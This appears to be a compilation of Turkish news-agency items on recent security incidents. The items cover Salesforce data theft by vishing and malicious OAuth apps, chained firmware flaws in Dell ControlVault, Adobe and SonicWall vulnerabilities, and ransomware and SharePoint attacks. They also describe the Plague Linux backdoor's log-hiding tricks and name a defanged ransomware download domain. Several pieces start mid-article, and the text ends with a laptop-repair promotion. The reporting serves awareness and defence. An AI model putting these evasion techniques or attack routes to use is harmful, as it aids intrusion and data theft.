ShinyHunters, geçmişte PowerSchool, Oracle Cloud, Snowflake, AT&T, NitroPDF, Wattpad ve MathWay gibi birçok kurumun veri ihlallerinden sorumlu tutulmuştu.

Bu saldırılardan etkilenen diğer şirketler arasında Adidas, Qantas, Allianz Life, Cisco ve LVMH bünyesindeki Louis Vuitton, Dior ile Tiffany & Co. da yer alıyor.

Kaynak: CUMHA - CUMHUR HABER AJANSI

ControlVault, parolalar, biyometrik veriler ve güvenlik kodlarını anakart üzerindeki Unified Security Hub (USH) modülünde saklıyor. Ancak CVE-2025-24311, CVE-2025-25050 (out-of-bounds), CVE-2025-25215 (arbitrary free), CVE-2025-24922 (stack overflow) ve CVE-2025-24919 (güvensiz serileştirme) gibi açıklar zincirlenerek, saldırganların bellenimde keyfi kod çalıştırmasına imkân tanıyor.

Cisco Talos’a göre, fiziksel erişimi olan bir saldırgan cihazı açarak özel bir USB konnektörüyle USH modülüne doğrudan erişebilir. Bu yöntem, Windows oturum açma bilgisi veya tam disk şifreleme parolası olmadan açıkların istismar edilmesini mümkün kılıyor. Başarılı istismar, yönetici yetkisi kazanmayı, Windows oturumunu atlamayı ve parmak izi doğrulamasını manipüle ederek herhangi bir parmak izini kabul ettirmeyi sağlayabiliyor.

Dell, Mart–Mayıs 2025 döneminde ControlVault3 sürücüsü ve bellenimi için güvenlik güncellemeleri yayımladı. Etkilenen modellerin tam listesi Dell’in güvenlik duyurusunda yer alıyor.

Cisco Talos, kullanıcıların sistemlerini Windows Update veya Dell’in resmi sitesinden güncel tutmalarını, kullanılmayan parmak izi okuyucu, akıllı kart okuyucu ve NFC gibi güvenlik donanımlarını devre dışı bırakmalarını öneriyor. Yüksek riskli ortamlarda parmak iziyle giriş özelliğinin kapatılması, BIOS üzerinden kasa açılma algılamanın (chassis intrusion detection) etkinleştirilmesi ve Windows’ta Gelişmiş Oturum Açma Güvenliği’nin (ESS) devreye alınması da tavsiye ediliyor.

Kaynak: CUMHA - CUMHUR HABER AJANSI

Bu kart, grubun oluşturulma tarihi, üye sayısı, potansiyel dolandırıcılık uyarıları ve grup davetlerini nasıl kontrol edebileceğinize dair bilgiler içeriyor. Kullanıcılar, sohbeti hiç açmadan gruptan ayrılabilecek ya da bilgileri inceledikten sonra sohbete girerek bağlamı görebilecek. Bu süre zarfında grup bildirimleri sessize alınacak.

Uygulama ayrıca, kişi listenizde olmayan bir numaradan mesaj aldığınızda, gönderen hakkında ek bilgi vererek dikkatli olmanız konusunda uyarı yapacak. WhatsApp, “Bilinmeyen bir numaradan gelen, hızlı kazanç vaat eden veya olağandışı bir mesaj aldığınızda duraklayın, sorgulayın ve doğrulayın” tavsiyesinde bulundu.

Şirket, 2025’in ilk altı ayında kullanıcılarını hedef alan dolandırıcılık merkezleriyle bağlantılı 6,8 milyondan fazla hesabı devre dışı bıraktığını açıkladı. Yılın başında ise OpenAI ile iş birliği yaparak Kamboçya’da faaliyet gösteren bir dolandırıcılık merkezini kapattı. Bu merkez; kripto para yatırımı vaadi, sahte beğeni satışı ve kiralık scooter üzerinden yürütülen piramit şemaları gibi yöntemler kullanıyordu.

WhatsApp, Nisan ayında da özel sohbetlerde ve grup konuşmalarında paylaşılan hassas bilgileri korumak için Gelişmiş Sohbet Gizliliği (Advanced Chat Privacy) özelliğini devreye almıştı.

Kaynak: CUMHA - CUMHUR HABER AJANSI

Bu açık, kimlik doğrulaması gerekmeksizin saldırganların sistemde uzaktan rastgele kod çalıştırmasına imkân veriyor. Şirket, güvenlik yamasının henüz hazır olmadığını, ancak istismarı engellemek için kısa vadeli koruma sağlayan bir geçici önlem aracının yayımlandığını açıkladı.

Geçici çözüm, bilinen tüm istismar yöntemlerine karşı koruma sağlasa da, Remote Install Agent fonksiyonunu devre dışı bırakıyor. Bu nedenle yöneticiler, güvenlik yaması yayımlanana kadar uzak ajan kurulumlarını kullanamayacak.

Trend Micro, güvenlik güncellemesinin 2025 Ağustos ortasında yayımlanacağını ve bu yamayla birlikte devre dışı bırakılan işlevin geri geleceğini belirtti. Şirket, özellikle yönetim konsolunun IP adresini internete açık tutan kullanıcıların, erişimi kısıtlayacak önlemleri derhal uygulamasını tavsiye etti.

Japonya Ulusal Bilgisayar Acil Müdahale Ekibi (JPCERT) de güvenlik açığı için uyarı yayımlayarak kullanıcıları en kısa sürede geçici mitigasyonları uygulamaya çağırdı.

Trend Micro geçmişte de Apex One’daki sıfırıncı gün açıklarını kapatmış, Eylül 2022’de CVE-2022-40139 ve Eylül 2023’te CVE-2023-41179 güvenlik açıklarını yamalamıştı. Şirket, bu ayın başında ise Apex Central ve Endpoint Encryption (TMEE) PolicyServer ürünlerindeki kritik yetki atlatma ve uzaktan kod çalıştırma açıklarını gidermişti.

Kaynak: CUMHA - CUMHUR HABER AJANSI

Araştırmacılar bu dönemde 1.469 geçerli güvenlik açığı raporu sundu. En yüksek ödül 200 bin dolar olurken, raporlar Azure, Microsoft 365, Dynamics 365, Power Platform, Windows, Edge ve Xbox gibi ürünlerde 1.000’den fazla potansiyel güvenlik açığının giderilmesine katkı sağladı.

Microsoft, bağımsız araştırmacıların özellikle yapay zeka gibi hızla gelişen alanlarda yüksek etkili güvenlik açıklarını bulmasının, yeni tehditlerin önünde olunmasına yardımcı olduğunu belirtti. Şirket, Koordine Edilmiş Güvenlik Açığı Bildirimi (Coordinated Vulnerability Disclosure) sürecinin kullanıcı güvenini güçlendirdiğini vurguladı.

Bu yıl Microsoft, Copilot AI, Defender ürünleri ve çeşitli kimlik yönetim sistemlerini kapsayan bounty programlarını genişletti. Copilot programına geleneksel çevrimiçi hizmet açıkları eklendi, Dynamics 365 ve Power Platform’a yeni bir yapay zeka kategorisi dahil edildi. Windows programına ise uzaktan hizmet reddi (DoS) ve yerel sandbox kaçış senaryoları ödülleri eklendi.

Kimlik doğrulama programı artık daha fazla API ve alan adını kapsarken, Defender programı Microsoft Defender for Identity (MDI), Microsoft Defender for Office (MDO) ve Microsoft Defender for Cloud Applications (MDA) ürünlerini de içeriyor.

Şirket, son dönemde orta seviye Microsoft Copilot güvenlik açıkları için ödülleri artırdı, bazı .NET ve ASP.NET Core açıkları için 40 bin dolara kadar ödeme yapacağını açıkladı. Ayrıca Power Platform ve Dynamics 365 AI açıkları için ödüller yükseltildi.

Microsoft, bu hafta başında 2025 Zero Day Quest yarışmasında toplam 5 milyon dolara kadar ödül dağıtacağını da duyurdu. Şirket, etkinliği “tarihin en büyük hacking organizasyonu” olarak tanımlıyor.

Kaynak: CUMHA - CUMHUR HABER AJANSI

Forbes’un haberine göre, saldırıda yalnızca müşteri isimleri, doğum tarihleri ve e-posta adresleri ele geçirildi. Parolalar, kimlik bilgileri veya finansal verilerin etkilenmediği açıklandı. BleepingComputer, verilerin Pandora’nın Salesforce veritabanından çalındığını öğrendi.

En az Ocak 2025’ten beri devam eden saldırı dalgasında, tehdit aktörleri sosyal mühendislik ve kimlik avı yöntemleriyle çalışanların Salesforce giriş bilgilerini çalıyor veya kötü amaçlı OAuth uygulamalarına yetki verilmesini sağlıyor. Bu erişimle şirketlerin Salesforce veritabanları indirilip fidye talebiyle şantaj yapılıyor.

ShinyHunters grubu, şirketleri özel olarak fidye talepleriyle tehdit ettiklerini ve ödeme yapılmaması halinde verilerin toplu satışını veya sızdırılmasını planladıklarını doğruladı. Grup, Snowflake veri hırsızlığı saldırılarında da benzer yöntemler kullanmıştı.

Salesforce ise kendi platformunun saldırıya uğramadığını, olayların bilinen bir güvenlik açığından kaynaklanmadığını belirterek, tüm müşterilere çok faktörlü kimlik doğrulama (MFA) kullanmaları, en az ayrıcalık ilkesini uygulamaları ve bağlı uygulamaları dikkatle yönetmeleri yönünde uyarıda bulundu.

Benzer saldırılardan Adidas, Qantas, Allianz Life ve LVMH bünyesindeki Louis Vuitton, Dior ile Tiffany & Co. markalarının da etkilendiği biliniyor. Ancak, henüz kamuoyuna açıklanmayan başka şirketlerin de saldırıya uğradığı belirtiliyor.

Kaynak: CUMHA - CUMHUR HABER AJANSI

BleepingComputer’ın edindiği bilgilere göre, sızan dosya karanlık ağ forumlarında değil, “PBS Kids” hayranlarının bulunduğu Discord topluluklarında paylaşıldı. Bu sunucularda genç yetişkinler, ergenler ve çocuklar favori televizyon programlarını konuşuyor. Kaynaklar, dosyanın bu gruplarda “merak, isyankâr heves veya arkadaş çevresinde dikkat çekme” amacıyla dolaştığını, ancak verilerin kötüye kullanılma ihtimalinin bulunduğunu aktardı.

Paylaşılan JSON formatındaki dosya, 3.997 PBS çalışanı ve bağlı kuruluş personeline ait isim, kurumsal e-posta adresi, görev unvanı, zaman dilimi, departman, lokasyon, iş fonksiyonları, hobiler ve amir isimlerini içeriyor.

PBS, olayın ardından etkilenen kullanıcılarla iletişime geçtiğini ve şu an için diğer sistemlerde bir güvenlik ihlali bulgusuna rastlanmadığını açıkladı. Şirketin açıklamasında, “MyPBS.org platformundan kullanıcı verilerinin yer aldığı dosyanın çevrimiçi olarak paylaşıldığı bilgisinin ardından kapsamlı bir soruşturma başlatıldı” denildi.

Verilerin şu ana kadar kötü amaçla kullanıldığına dair bir bulgu olmasa da, dosyanın bu hafta sonu bile Discord topluluklarında dolaşmaya devam ettiği belirtiliyor. Özellikle PBS ve NPR üzerindeki siyasi baskılar göz önünde bulundurulduğunda, bu verilerin taciz veya doxxing amacıyla kullanılabileceği endişesi dile getiriliyor.

Kaynak: CUMHA - CUMHUR HABER AJANSI

Adobe, Adobe Experience Manager (AEM) Forms on JEE için iki kritik sıfırıncı gün güvenlik açığını kapatan acil güncellemeler yayımladı. CVE-2025-54253 ve CVE-2025-54254 olarak izlenen açıklar, kimlik doğrulaması gerekmeksizin uzaktan kod çalıştırma ve yerel dosya okuma saldırılarına olanak tanıyor.

CVE-2025-54253, /adminui modülündeki kimlik doğrulama atlatma hatası ve yanlış yapılandırılmış geliştirici ayarından kaynaklanıyor. Struts2’nin geliştirme modunun açık bırakılması, saldırganların HTTP istekleriyle OGNL ifadeleri çalıştırmasına imkân veriyor. Bu açık, CVSS 8.6 “kritik” olarak derecelendirildi.

CVE-2025-54254 ise SOAP tabanlı kimlik doğrulama hizmetinde yer alan XML External Entity (XXE) zafiyetinden kaynaklanıyor. Özel hazırlanmış XML istekleriyle saldırganlar, kimlik doğrulama olmadan sunucu üzerindeki yerel dosyaları (örneğin win.ini) okuyabiliyor. Bu açık CVSS 10.0 ile “maksimum kritik” seviyede değerlendirildi.

Söz konusu güvenlik sorunlarını Shubham Shah ve Adam Kues (Searchlight Cyber) 28 Nisan 2025’te Adobe’a bildirdi. Üçüncü bir açık olan CVE-2025-49533 (Java deserialization yoluyla RCE) ise aynı güncelleme paketiyle giderildi. Araştırmacılar, 90 günlük bekleme süresi dolduktan sonra 29 Temmuz’da teknik ayrıntıları kamuya açıkladı.

Adobe, yöneticilere en kısa sürede en son güncellemeleri ve hotfix’leri yüklemelerini tavsiye etti. Güncelleme imkânı olmayan sistemlerde ise platform erişiminin internetten kısıtlanması önerildi.

Kaynak: CUMHA - CUMHUR HABER AJANSI

Elde edilen veriler arasında kullanıcıların adları, çalıştıkları kurum isimleri, adresleri, Cisco tarafından atanmış kullanıcı kimlikleri, e-posta adresleri, telefon numaraları ve hesap oluşturma tarihleri gibi meta veriler yer alıyor. Cisco, olayda kurumsal müşterilere ait gizli bilgiler, parolalar veya hassas verilerin ele geçirilmediğini, ürün ve hizmetlerin etkilenmediğini vurguladı.

Şirket, saldırganın ilgili CRM sistemine erişiminin derhal sonlandırıldığını, veri koruma otoriteleriyle iletişime geçildiğini ve yasal gereklilikler doğrultusunda etkilenen kullanıcıların bilgilendirildiğini açıkladı. Cisco, benzer saldırıları önlemek için personeline vishing girişimlerini tanıma ve önleme konusunda ek eğitimler vereceğini duyurdu.

Olayın, ShinyHunters grubu ile ilişkilendirilen ve son haftalarda Adidas, Qantas, Allianz Life, LVMH markaları ile Chanel gibi büyük şirketleri etkileyen Salesforce tabanlı veri hırsızlığı saldırıları dalgasının bir parçası olabileceği değerlendiriliyor. Cisco, verilerin Salesforce ortamından mı çalındığını veya kaç kullanıcının etkilendiğini ise doğrulamadı.

Geçmişte de benzer güvenlik sorunları yaşayan şirket, Ekim ayında DevHub portalını, IntelBroker adlı tehdit aktörünün sızdırdığı “gizli” veriler sonrası çevrimdışına almış, Kasım ayında ise bunun hatalı yapılandırılmış herkese açık bir portal nedeniyle gerçekleştiğini açıklamıştı.

Kaynak: CUMHA - CUMHUR HABER AJANSI

Arctic Wolf, saldırıların ilk erişim yönteminin henüz netleşmediğini, ancak kimlik bilgisi hırsızlığı, brute force, sözlük saldırıları ve kimlik bilgisi doldurma yöntemlerinin tüm vakalarda kesin olarak dışlanmadığını belirtti. Yine de sıfırıncı gün açığının varlığı “yüksek olasılıklı” olarak değerlendirildi.

Huntress tarafından yapılan ayrı bir analizde, SonicWall VPN’lerde çok faktörlü kimlik doğrulamayı atlatabilen ve fidye yazılımı dağıtabilen bir açığın aktif olarak istismar edildiği bildirildi. Huntress, VPN hizmetinin tamamen devre dışı bırakılmasını veya IP allow-listing yöntemiyle erişimin kısıtlanmasını önerdi. Şirket, saldırganların ilk ihlalin ardından saatler içinde etki alanı denetleyicilerine yöneldiğini vurguladı.

SonicWall, müşterilere şu önlemleri almalarını tavsiye etti:

• SSLVPN hizmetini mümkünse devre dışı bırakmak,
• Erişimi yalnızca güvenilir IP adresleriyle sınırlandırmak,
• Botnet Koruması ve Coğrafi IP Filtreleme gibi güvenlik servislerini etkinleştirmek,
• Tüm uzak erişimlerde MFA kullanmak,
• Kullanılmayan hesapları silmek.

Şirket, son 72 saatte SSLVPN açık olan Gen 7 güvenlik duvarlarını hedef alan vakalarda artış yaşandığını belirterek, olayların bilinen bir açıkla mı yoksa yeni bir güvenlik açığıyla mı bağlantılı olduğunun araştırıldığını duyurdu.

SonicWall, kısa süre önce SMA 100 cihazları için uzaktan kod çalıştırmaya yol açabilecek kritik bir güvenlik açığını (CVE-2025-40599) da yamalama uyarısı yapmıştı.

Kaynak: CUMHA - CUMHUR HABER AJANSI

CVE-2025-21479, GPU micronode üzerinde yetkisiz komut çalıştırılması sonucu bellek bozulmasına yol açan bir yetkilendirme hatası olarak tanımlanıyor. CVE-2025-27038 ise Chrome tarayıcısında grafik işleme sırasında ortaya çıkan use-after-free hatasıyla bellek bozulmasına neden oluyor.

Qualcomm, bu açıklar için yamaları Mayıs ayında OEM üreticilerine sağlamış ve etkilenen cihazların en kısa sürede güncellenmesini tavsiye etmişti. ABD Siber Güvenlik ve Altyapı Güvenliği Ajansı (CISA) da her iki açığı 3 Haziran’da “aktif olarak istismar edilen açıklar” listesine ekleyerek federal kurumlara 24 Haziran’a kadar sistemlerini koruma talimatı verdi.

Bu ayki Android güvenlik güncellemesinde ayrıca, sistem bileşeninde ayrıcalığı olmayan saldırganların, diğer güvenlik açıklarıyla zincirlenerek kullanıcı etkileşimi olmadan uzaktan kod çalıştırmasına imkân tanıyan kritik bir hata da giderildi.

Google, 2025-08-01 ve 2025-08-05 olmak üzere iki güvenlik yaması paketi sundu. İkinci paket, birincideki tüm düzeltmelerin yanı sıra kapalı kaynak üçüncü taraf bileşenleri ve çekirdek alt bileşenlerine yönelik yamaları da içeriyor. Google Pixel cihazları bu güncellemeleri anında alırken, diğer üreticiler test ve uyarlama sürecinden geçtiği için gecikmeli dağıtım yapabiliyor.

Geçmişte de benzer tehditlerle karşılaşan Android ekibi, Mart ayında Sırp yetkililerin el konulan cihazları açmak için kullandığı iki sıfırıncı gün açığını kapatmıştı. Kasım 2024’te ise NoviSpy casus yazılım saldırılarında kullanılan başka bir Android sıfırıncı gün açığı giderilmişti.

Kaynak: CUMHA - CUMHUR HABER AJANSI

Geçen yıl 4 milyon dolar ödül havuzuyla gerçekleştirilen yarışmada, bulut ve yapay zeka ürünlerindeki güvenlik açıklarını bulan araştırmacılara toplam 1,6 milyon dolar ödül dağıtılmış, 600’den fazla güvenlik açığı bildirimi alınmıştı.

Bu yıl 4 Ağustos - 4 Ekim 2025 tarihleri arasında başvurular kabul edilecek. Yarışma, tüm güvenlik araştırmacılarına açık olacak ve kritik açıklar ile yüksek etkili senaryolar için yüzde 50’ye kadar ödül çarpanı uygulanacak. Öncelikli ürünler arasında Microsoft Azure, Copilot, Dynamics 365, Power Platform, Identity ve M365 yer alıyor.

Başarılı araştırmacılar, 2026 baharında Microsoft’un Redmond kampüsünde düzenlenecek canlı hacking etkinliğine davet edilecek. Etkinlikte katılımcılar, Microsoft Security Response Center ve ürün ekipleriyle doğrudan çalışacak. Yarışma sürecinde Microsoft’un AI Red Team, MSRC ve Dynamics ekipleri, yapay zeka sistem testleri, bug bounty programları ve güvenlik araştırma yöntemleri konularında eğitimler verecek.

Zero Day Quest, Microsoft’un 2023’te başlattığı Secure Future Initiative (SFI) kapsamında düzenleniyor. SFI, şirketin güvenlik kültürünü geliştirmeyi ve “varsayılan olarak güvenli” yaklaşımını benimsemeyi hedefliyor. Microsoft, yarışmadan elde edilen bulguların bulut ve yapay zeka güvenliğini artırmak için şirket genelinde paylaşılacağını belirtti.

Şirket ayrıca .NET ve ASP.NET Core açıkları için maksimum ödülü 40 bin dolara çıkarırken, Power Platform ve Dynamics 365 AI açıkları ile Microsoft Copilot güvenlik hataları için de ödülleri artırdı. Copilot açıkları için tüm bildirimlerde yüzde 100 ödül çarpanı uygulanmaya başlandı.

Kaynak: CUMHA - CUMHUR HABER AJANSI

Chanel’in açıklamasına göre, yalnızca müşteri hizmetleri merkeziyle iletişime geçen bazı kişilerin isim, e-posta adresi, posta adresi ve telefon numarası gibi bilgileri etkilendi. Şirket, başka hiçbir kişisel bilginin bu veritabanında bulunmadığını ve etkilenen müşterilerin bilgilendirildiğini belirtti.

BleepingComputer’ın edindiği bilgilere göre, veriler Chanel’in Salesforce ortamından çalındı. Bu olay, ShinyHunters adlı fidye ve veri hırsızlığı grubunun yürüttüğü geniş çaplı Salesforce veri hırsızlığı saldırılarının bir parçası. Mandiant’ın raporuna göre, saldırganlar vishing (telefonla kimlik avı) yöntemleriyle çalışanlardan giriş bilgilerini alıyor veya kötü amaçlı bir OAuth uygulamasına erişim izni verdirerek Salesforce hesaplarına sızıyor.

Erişim sağlandıktan sonra, saldırganlar müşteri veritabanlarını kopyalayıp şirketleri e-posta yoluyla fidye talepleriyle tehdit ediyor. Salesforce, kendi platformunda herhangi bir güvenlik açığı bulunmadığını ve ihlallerin tamamen sosyal mühendislik yoluyla müşteri hesaplarının ele geçirilmesinden kaynaklandığını vurguladı. Şirket, tüm kullanıcıları çok faktörlü kimlik doğrulama (MFA) kullanmaya, en az ayrıcalık ilkesini uygulamaya ve bağlı uygulamaları dikkatle yönetmeye çağırdı.

ShinyHunters grubunun saldırılarından etkilenen diğer markalar arasında Adidas, Qantas, Allianz Life ve LVMH bünyesindeki Louis Vuitton, Dior ile Tiffany & Co. yer alıyor. Şu ana kadar çalınan verilerin kamuya sızdırılmadığı, şirketlerin e-posta ile tehdit edildiği bildirildi.

Kaynak: CUMHA - CUMHUR HABER AJANSI

Proton Authenticator, Windows, macOS, Linux, Android ve iOS’ta çalışan, ücretsiz ve bağımsız bir iki faktörlü kimlik doğrulama uygulaması olarak tasarlandı. Uygulama, web siteleri ve uygulamalara girişte tek kullanımlık kodlar üretmek için gerekli TOTP sırlarını saklıyor.

Sorun, bir kullanıcının Reddit’te (daha sonra silinen) paylaşımıyla gündeme geldi. Kullanıcı, bazı 2FA girişlerinin kaybolduğunu fark edip hata raporu hazırlarken uygulama günlüklerinde tüm TOTP sırlarının açıkça göründüğünü keşfetti. Hatanın, iOS sürümünde TOTP girişine ait bilgilerin bir params değişkenine eklenmesi ve bu verilerin günlük kayıtlarına dahil edilmesinden kaynaklandığı belirlendi.

Proton, hatayı doğrulayarak iOS uygulamasının 1.1.1 sürümüyle App Store’da yayımlanan güncellemede düzeltildiğini açıkladı. Şirket, sırların hiçbir zaman sunucuya şifrelenmemiş olarak iletilmediğini, tüm senkronizasyonun uçtan uca şifrelemeyle yapıldığını ve günlüklerin yalnızca cihazda tutulduğunu belirtti.

Proton ayrıca, cihaz erişimi olan bir kişinin bu günlükleri görmese bile sırları elde edebileceğini, bu nedenle cihaz güvenliğinin kullanıcı sorumluluğunda olduğunu vurguladı. Uzaktan sömürülemeyen bu hata, günlük dosyalarının paylaşılması durumunda üçüncü taraflara erişim riski oluşturuyordu. Bu veriler başka bir kimlik doğrulayıcıya aktarılarak ilgili hesaplara giriş kodu üretilebilirdi.

Kaynak: CUMHA - CUMHUR HABER AJANSI

Plague, analiz ve tersine mühendislik girişimlerini engellemek için anti-debugging yeteneklerine sahip. Yazılım ayrıca sabitlenmiş parolalar üzerinden gizli erişim sağlıyor, saldırgan oturumlarının izlerini gizliyor, komut geçmişini /dev/null dizinine yönlendirerek kayıtların tutulmasını engelliyor ve SSH bağlantı bilgilerini sistem ortam değişkenlerinden siliyor.

Araştırmacı Pierre-Henri Pezier, zararlı yazılımın kimlik doğrulama katmanına derinlemesine entegre olduğunu, sistem güncellemelerinden etkilenmediğini ve adli izler bırakmadığını belirtti. Çeşitli Linux dağıtımlarında farklı GCC sürümleriyle derlenmiş örnekler, yazılımın uzun süredir aktif olarak geliştirildiğini gösteriyor.

Nextron Systems, son bir yılda VirusTotal’a yüklenen çok sayıda varyantın hiçbir antivirüs yazılımı tarafından zararlı olarak işaretlenmediğini, bu durumun saldırganların faaliyetlerini tespit edilmeden sürdürebildiğini ortaya koyduğunu bildirdi.

Mayıs ayında aynı şirket, PAM altyapısını kötüye kullanarak kimlik bilgilerini çalabilen, kimlik doğrulamayı atlayabilen ve kalıcı erişim sağlayabilen başka bir zararlı yazılım keşfetmişti.

Kaynak: CUMHA - CUMHUR HABER AJANSI

4L4MD4R, 27 Temmuz’da bir zararlı yazılım yükleyicisinin tespit edilmesiyle ortaya çıktı. Bu yükleyici, fidye yazılımını theinnovationfactory[.]it alan adından indirerek çalıştırıyor. Yükleyicinin, hedef cihazlarda güvenlik izleme işlevlerini devre dışı bırakmak için tasarlanmış PowerShell komutları kullandığı belirlendi.

Araştırmalara göre 4L4MD4R, GoLang ile yazılmış ve UPX ile paketlenmiş durumda. Çalıştırıldığında AES şifreli yükünü bellekte çözüyor, ayrılmış belleğe yüklüyor ve yeni bir iş parçacığında çalıştırıyor. Saldırı sonrası dosyaları şifreleyen zararlı yazılım, 0,005 Bitcoin fidye talep ediyor ve şifrelenmiş dosyaların listesi ile fidye notlarını sistemde bırakıyor.

Microsoft ve Google, ToolShell saldırılarını Çin merkezli tehdit aktörleriyle ilişkilendirdi. Microsoft, Linen Typhoon, Violet Typhoon ve Storm-2603 olarak izlenen üç devlet destekli grubun güvenlik açıklarını istismar ettiğini açıkladı.

Şimdiye kadar ABD Ulusal Nükleer Güvenlik İdaresi, Eğitim Bakanlığı, Florida Gelir İdaresi, Rhode Island Genel Kurulu ve Avrupa ile Orta Doğu’daki bazı devlet kurumlarının bu saldırılardan etkilendiği bildirildi.

ToolShell saldırıları ilk olarak Hollanda merkezli Eye Security tarafından tespit edildi. Sıfırıncı gün açıkları CVE-2025-49706 ve CVE-2025-49704 üzerinden yürütülen saldırılar, 7 Temmuz’dan itibaren hükümet, telekom ve teknoloji kuruluşlarını hedef aldı. Microsoft, Temmuz 2025 güvenlik güncellemeleriyle bu açıkları kapattığını, ayrıca yamalanmış SharePoint sunucularını etkileyen iki yeni sıfırıncı gün açığı için CVE-2025-53770 ve CVE-2025-53771 kimliklerini atadığını duyurdu.

Eye Security CTO’su Piet Kerkhofs, gerçek etkinin açıklanan rakamların üzerinde olduğunu, en az 400 sunucunun zararlı yazılımla enfekte edildiğini ve 148 kurumun uzun süreli olarak ihlal altında kalmış olabileceğini belirtti. ABD Siber Güvenlik ve Altyapı Güvenliği Ajansı (CISA), CVE-2025-53770 güvenlik açığını istismar edilen açıklar listesine ekleyerek federal kurumlara 24 saat içinde sistemlerini güvenceye almaları talimatını verdi.

Kaynak: CUMHA - CUMHUR HABER AJANSI

Şirketin açıklamasına göre saldırganlar, AMO ekibi adına sahte e-postalar göndererek geliştirici hesaplarının erişim haklarını korumak için güncelleme yapılması gerektiğini iddia ediyor. E-postalarda genellikle “Mozilla Eklenti hesabınızın geliştirici özelliklerine erişmeye devam etmesi için güncelleme gereklidir” şeklinde ifadeler yer alıyor.

Mozilla, geliştiricilerin gelen e-postaların mozilla.org, firefox.com, mozilla.com veya bunların alt alan adlarından geldiğini doğrulamaları gerektiğini, SPF, DKIM ve DMARC gibi e-posta kimlik doğrulama kontrollerinin geçerli olup olmadığını kontrol etmelerini tavsiye etti. Şirket ayrıca, şüpheli e-postalardaki bağlantılara tıklanmaması ve giriş bilgilerinin yalnızca resmi Mozilla veya Firefox alan adlarında girilmesi gerektiğini vurguladı.

Saldırıların ölçeği ve herhangi bir geliştirici hesabının ele geçirilip geçirilmediği henüz açıklanmadı. Ancak en az bir geliştiricinin saldırıya maruz kaldığını bildirdiği öğrenildi. Mozilla, yeni bilgiler ortaya çıktıkça güncelleme yapacağını belirtti.

Bu uyarı, geçen ay Mozilla Add-ons Operasyon ekibinin kripto para cüzdanlarını boşaltmaya yönelik kötü amaçlı Firefox uzantılarını engellemeyi hedefleyen yeni bir güvenlik özelliğini duyurmasının ardından geldi. Mozilla Add-ons Operasyon Müdürü Andreas Wagner, son yıllarda yüzlerce kötü amaçlı eklentiyi kaldırdıklarını ve siber saldırganların geçen yıl bu yöntemle 494 milyon dolar değerinde kripto para çaldığını açıkladı.

Kaynak: CUMHA - CUMHUR HABER AJANSI

Cloudflare Email Security ekibinin tespitlerine göre, saldırganlar Proofpoint ve Intermedia tarafından korunan e-posta hesaplarını ele geçirerek, zararlı bağlantıları bu hizmetlerin güvenli görünen URL’leri aracılığıyla iletti. Bağlantılar, zincirleme yönlendirmeler ve URL kısaltma servisleriyle gizlenerek kullanıcıların oltalama sitelerine ulaşması sağlandı.

Araştırmacılar, saldırıların sahte sesli mesaj bildirimleri veya Microsoft Teams üzerinde paylaşılan belgeler gibi görünümlerle yürütüldüğünü aktardı. Yönlendirme zincirinin sonunda, kullanıcıların giriş bilgilerini ele geçirmek için tasarlanmış Microsoft Office 365 oltalama sayfaları yer aldı.

Intermedia hizmetinin kötüye kullanıldığı vakalarda ise saldırganlar, “Zix” güvenli mesaj bildirimleri veya yeni bir Teams mesajı bildirimi gibi e-postalar gönderdi. Bu e-postalarda yer alan ve Intermedia tarafından sarılmış görünen bağlantılar, Constant Contact platformu üzerinden barındırılan oltalama sayfalarına yönlendirdi.

Cloudflare, meşru görünen bağlantıların saldırı başarısını artırdığını, link-wrapping özelliğinin bu şekilde istismar edilmesinin ise oltalama yöntemlerinde yeni bir gelişme olduğunu vurguladı.

Kaynak: CUMHA - CUMHUR HABER AJANSI

Bilgi Teknolojileri ve İletişim Kurumu (BTK) Ulusal Siber Olaylara Müdahale Merkezi (USOM), sahte nitelikli elektronik sertifika (NES) vakalarına ilişkin teknik tespitlerin ardından adli sürecin başlatıldığını duyurdu.

Yetkililerden yapılan açıklamaya göre, süreç bir üniversitenin şikayeti üzerine başlatıldı. BTK’nın tespitleri doğrultusunda, Ağustos 2024’ten itibaren Ankara Cumhuriyet Başsavcılığı tarafından kapsamlı bir soruşturma yürütülüyor.

İlk aşamada 35 sahte e-imza iptal edildi. Ardından yapılan incelemelerde 9 sahte e-imza daha tespit edilerek iptal işlemleri tamamlandı. Böylece toplamda 44 sahte e-imza geçersiz hale getirildi.

Vatandaşlara Sorgulama Uyarısı

BTK, sahteciliğe karşı güvenlik mekanizmalarının güçlendirildiğini ve farkındalık çalışmaları başlatıldığını bildirdi. Tüm NES sahiplerinin T.C. kimlik numaralarına tanımlı mobil numaralarına, sertifika durumlarını kontrol etmeleri için bilgilendirme SMS’i gönderildi.

Açıklamada, vatandaşların adlarına üretilen güvenli elektronik imzaları e-Devlet Kapısı’nda yer alan “Nitelikli Elektronik Sertifika Sorgulama” hizmeti üzerinden https://www.turkiye.gov.tr/btv-elektronik-imza-sertifikalari-sorgulama adresinden kontrol edebilecekleri belirtildi.

BTK, dijital sahteciliğe karşı mücadelenin kararlılıkla sürdürüleceğini vurguladı.

Kaynak: CUMHA - CUMHUR HABER AJANSI

Sık Görülen Arızalar ve Çözüm Yaklaşımı
Servis merkezinde en çok karşılaşılan sorunlar arasında ekran kırıkları, anakart arızaları, batarya problemleri, SSD/HDD hataları, fan arızaları ve yazılım çökmeleri yer alıyor. Tüm bu arızalara uzman teknisyenler tarafından müdahale edilerek cihazın yeniden yüksek performansla çalışması sağlanıyor.

Teknik Servis Hizmetlerinin Özellikleri
Firmaya göre teknik servis süreci; arıza tespiti, fiyatlandırma ve kullanıcı onayı sonrası onarım olarak ilerliyor. Serviste sadece Lenovo onaylı orijinal parçalar kullanılıyor. Ayrıca veri güvenliği ilkesi çerçevesinde, kullanıcı verilerine onarım sürecinde herhangi bir müdahalede bulunulmuyor.

Sunulan Hizmetler
Servis bünyesinde sunulan başlıca hizmetler; ekran ve anakart değişimi, SSD/HDD veri kurtarma, BIOS güncellemesi, batarya değişimi, termal bakım, klavye ve kasa tamiri ile sistem lisanslama işlemleri olarak sıralanıyor.

Kurumsal Destek ve Uzaktan Hizmet
Ankara’daki kurumsal firmalara da hizmet veren teknik servis, sözleşmeli bakım anlaşmalarıyla toplu cihaz kontrolleri yaparak iş sürekliliğini destekliyor. Ayrıca Türkiye genelinden kargo ile gelen cihazlara da aynı kapsamda hizmet veriliyor.

Servise ulaşmak isteyen kullanıcılar, cihazlarını elden teslim edebileceği gibi kargo seçeneğini de tercih edebiliyor. Teknik destek hattı üzerinden ön teşhis hizmeti verilerek cihazla ilgili ilk yönlendirmeler sağlanıyor.

